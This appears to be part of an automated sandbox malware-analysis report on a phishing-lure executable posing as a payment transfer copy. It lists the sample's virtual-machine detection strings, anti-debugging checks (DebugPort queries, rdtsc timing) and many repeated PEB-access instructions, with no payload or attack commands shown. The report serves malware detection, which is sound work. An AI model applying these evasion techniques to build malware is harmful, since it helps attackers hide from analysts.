Source: explorer.exe, 00000005.00000002.755874779.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Code function: 4_2_00409A90 rdtsc

4_2_00409A90

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Code function: 4_2_0040ACD0 LdrLoadDll,

4_2_0040ACD0

Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE58EC mov eax, dword ptr fs:[00000030h]	4_2_00FE58EC
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]	4_2_01004120
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]	4_2_01004120
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]	4_2_01004120
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]	4_2_01004120
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01004120 mov ecx, dword ptr fs:[00000030h]	4_2_01004120
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101513A mov eax, dword ptr fs:[00000030h]	4_2_0101513A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101513A mov eax, dword ptr fs:[00000030h]	4_2_0101513A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100B944 mov eax, dword ptr fs:[00000030h]	4_2_0100B944
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100B944 mov eax, dword ptr fs:[00000030h]	4_2_0100B944
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE9080 mov eax, dword ptr fs:[00000030h]	4_2_00FE9080
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100C182 mov eax, dword ptr fs:[00000030h]	4_2_0100C182
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101A185 mov eax, dword ptr fs:[00000030h]	4_2_0101A185
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01012990 mov eax, dword ptr fs:[00000030h]	4_2_01012990
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010669A6 mov eax, dword ptr fs:[00000030h]	4_2_010669A6
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010161A0 mov eax, dword ptr fs:[00000030h]	4_2_010161A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010161A0 mov eax, dword ptr fs:[00000030h]	4_2_010161A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]	4_2_010651BE
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]	4_2_010651BE
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]	4_2_010651BE
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]	4_2_010651BE
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]	4_2_00FFB02A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]	4_2_00FFB02A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]	4_2_00FFB02A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]	4_2_00FFB02A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010741E8 mov eax, dword ptr fs:[00000030h]	4_2_010741E8
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01067016 mov eax, dword ptr fs:[00000030h]	4_2_01067016
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01067016 mov eax, dword ptr fs:[00000030h]	4_2_01067016
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01067016 mov eax, dword ptr fs:[00000030h]	4_2_01067016
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B4015 mov eax, dword ptr fs:[00000030h]	4_2_010B4015
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B4015 mov eax, dword ptr fs:[00000030h]	4_2_010B4015
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]	4_2_00FEB1E1
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]	4_2_00FEB1E1
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]	4_2_00FEB1E1
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]	4_2_0101002D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]	4_2_0101002D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]	4_2_0101002D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]	4_2_0101002D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]	4_2_0101002D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01000050 mov eax, dword ptr fs:[00000030h]	4_2_01000050
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01000050 mov eax, dword ptr fs:[00000030h]	4_2_01000050
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A2073 mov eax, dword ptr fs:[00000030h]	4_2_010A2073
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B1074 mov eax, dword ptr fs:[00000030h]	4_2_010B1074
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01063884 mov eax, dword ptr fs:[00000030h]	4_2_01063884
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01063884 mov eax, dword ptr fs:[00000030h]	4_2_01063884
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEB171 mov eax, dword ptr fs:[00000030h]	4_2_00FEB171
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEB171 mov eax, dword ptr fs:[00000030h]	4_2_00FEB171
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEC962 mov eax, dword ptr fs:[00000030h]	4_2_00FEC962
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]	4_2_010120A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]	4_2_010120A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]	4_2_010120A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]	4_2_010120A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]	4_2_010120A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]	4_2_010120A0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010290AF mov eax, dword ptr fs:[00000030h]	4_2_010290AF
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101F0BF mov ecx, dword ptr fs:[00000030h]	4_2_0101F0BF
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101F0BF mov eax, dword ptr fs:[00000030h]	4_2_0101F0BF
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101F0BF mov eax, dword ptr fs:[00000030h]	4_2_0101F0BF
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]	4_2_0107B8D0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107B8D0 mov ecx, dword ptr fs:[00000030h]	4_2_0107B8D0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]	4_2_0107B8D0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]	4_2_0107B8D0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]	4_2_0107B8D0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]	4_2_0107B8D0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE9100 mov eax, dword ptr fs:[00000030h]	4_2_00FE9100
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE9100 mov eax, dword ptr fs:[00000030h]	4_2_00FE9100
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE9100 mov eax, dword ptr fs:[00000030h]	4_2_00FE9100
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A131B mov eax, dword ptr fs:[00000030h]	4_2_010A131B
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]	4_2_00FFAAB0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]	4_2_00FFAAB0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B8B58 mov eax, dword ptr fs:[00000030h]	4_2_010B8B58
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]	4_2_00FE52A5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]	4_2_00FE52A5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]	4_2_00FE52A5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]	4_2_00FE52A5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]	4_2_00FE52A5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01013B7A mov eax, dword ptr fs:[00000030h]	4_2_01013B7A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01013B7A mov eax, dword ptr fs:[00000030h]	4_2_01013B7A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010A138A mov eax, dword ptr fs:[00000030h]	4_2_010A138A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0109D380 mov ecx, dword ptr fs:[00000030h]	4_2_0109D380
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101B390 mov eax, dword ptr fs:[00000030h]	4_2_0101B390
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01012397 mov eax, dword ptr fs:[00000030h]	4_2_01012397
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01014BAD mov eax, dword ptr fs:[00000030h]	4_2_01014BAD
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01014BAD mov eax, dword ptr fs:[00000030h]	4_2_01014BAD
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01014BAD mov eax, dword ptr fs:[00000030h]	4_2_01014BAD
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B5BA5 mov eax, dword ptr fs:[00000030h]	4_2_010B5BA5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]	4_2_00FE9240
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]	4_2_00FE9240
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]	4_2_00FE9240
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]	4_2_00FE9240
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010653CA mov eax, dword ptr fs:[00000030h]	4_2_010653CA
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010653CA mov eax, dword ptr fs:[00000030h]	4_2_010653CA
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]	4_2_010103E2
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]	4_2_010103E2
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]	4_2_010103E2
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]	4_2_010103E2
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]	4_2_010103E2
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]	4_2_010103E2
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEAA16 mov eax, dword ptr fs:[00000030h]	4_2_00FEAA16
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEAA16 mov eax, dword ptr fs:[00000030h]	4_2_00FEAA16
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100DBE9 mov eax, dword ptr fs:[00000030h]	4_2_0100DBE9
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE5210 mov eax, dword ptr fs:[00000030h]	4_2_00FE5210
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE5210 mov ecx, dword ptr fs:[00000030h]	4_2_00FE5210
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE5210 mov eax, dword ptr fs:[00000030h]	4_2_00FE5210
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FE5210 mov eax, dword ptr fs:[00000030h]	4_2_00FE5210
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF8A0A mov eax, dword ptr fs:[00000030h]	4_2_00FF8A0A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01003A1C mov eax, dword ptr fs:[00000030h]	4_2_01003A1C
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01024A2C mov eax, dword ptr fs:[00000030h]	4_2_01024A2C
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01024A2C mov eax, dword ptr fs:[00000030h]	4_2_01024A2C
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01074257 mov eax, dword ptr fs:[00000030h]	4_2_01074257
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0109B260 mov eax, dword ptr fs:[00000030h]	4_2_0109B260
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0109B260 mov eax, dword ptr fs:[00000030h]	4_2_0109B260
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B8A62 mov eax, dword ptr fs:[00000030h]	4_2_010B8A62
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF1B8F mov eax, dword ptr fs:[00000030h]	4_2_00FF1B8F
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF1B8F mov eax, dword ptr fs:[00000030h]	4_2_00FF1B8F
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0102927A mov eax, dword ptr fs:[00000030h]	4_2_0102927A
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101D294 mov eax, dword ptr fs:[00000030h]	4_2_0101D294
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101D294 mov eax, dword ptr fs:[00000030h]	4_2_0101D294
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEDB60 mov ecx, dword ptr fs:[00000030h]	4_2_00FEDB60
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEF358 mov eax, dword ptr fs:[00000030h]	4_2_00FEF358
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101FAB0 mov eax, dword ptr fs:[00000030h]	4_2_0101FAB0
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FEDB40 mov eax, dword ptr fs:[00000030h]	4_2_00FEDB40
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01012ACB mov eax, dword ptr fs:[00000030h]	4_2_01012ACB
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01012AE4 mov eax, dword ptr fs:[00000030h]	4_2_01012AE4
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0106A537 mov eax, dword ptr fs:[00000030h]	4_2_0106A537
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]	4_2_01014D3B
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]	4_2_01014D3B
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01014D3B mov eax, dword ptr fs:[00000030h]	4_2_01014D3B
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B8D34 mov eax, dword ptr fs:[00000030h]	4_2_010B8D34
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01023D43 mov eax, dword ptr fs:[00000030h]	4_2_01023D43
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01063540 mov eax, dword ptr fs:[00000030h]	4_2_01063540
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01007D50 mov eax, dword ptr fs:[00000030h]	4_2_01007D50
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_00FF849B mov eax, dword ptr fs:[00000030h]	4_2_00FF849B
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100C577 mov eax, dword ptr fs:[00000030h]	4_2_0100C577
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0100C577 mov eax, dword ptr fs:[00000030h]	4_2_0100C577
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]	4_2_01012581
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]	4_2_01012581
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]	4_2_01012581
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01012581 mov eax, dword ptr fs:[00000030h]	4_2_01012581
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101FD9B mov eax, dword ptr fs:[00000030h]	4_2_0101FD9B
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_0101FD9B mov eax, dword ptr fs:[00000030h]	4_2_0101FD9B
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010135A1 mov eax, dword ptr fs:[00000030h]	4_2_010135A1
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B05AC mov eax, dword ptr fs:[00000030h]	4_2_010B05AC
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B05AC mov eax, dword ptr fs:[00000030h]	4_2_010B05AC
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]	4_2_01011DB5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]	4_2_01011DB5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01011DB5 mov eax, dword ptr fs:[00000030h]	4_2_01011DB5
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]	4_2_01066DC9
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]	4_2_01066DC9
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]	4_2_01066DC9
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066DC9 mov ecx, dword ptr fs:[00000030h]	4_2_01066DC9
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]	4_2_01066DC9
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01066DC9 mov eax, dword ptr fs:[00000030h]	4_2_01066DC9
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_01098DF1 mov eax, dword ptr fs:[00000030h]	4_2_01098DF1
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]	4_2_010B740D
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Code function: 4_2_010B740D mov eax, dword ptr fs:[00000030h]	4_2_010B740D
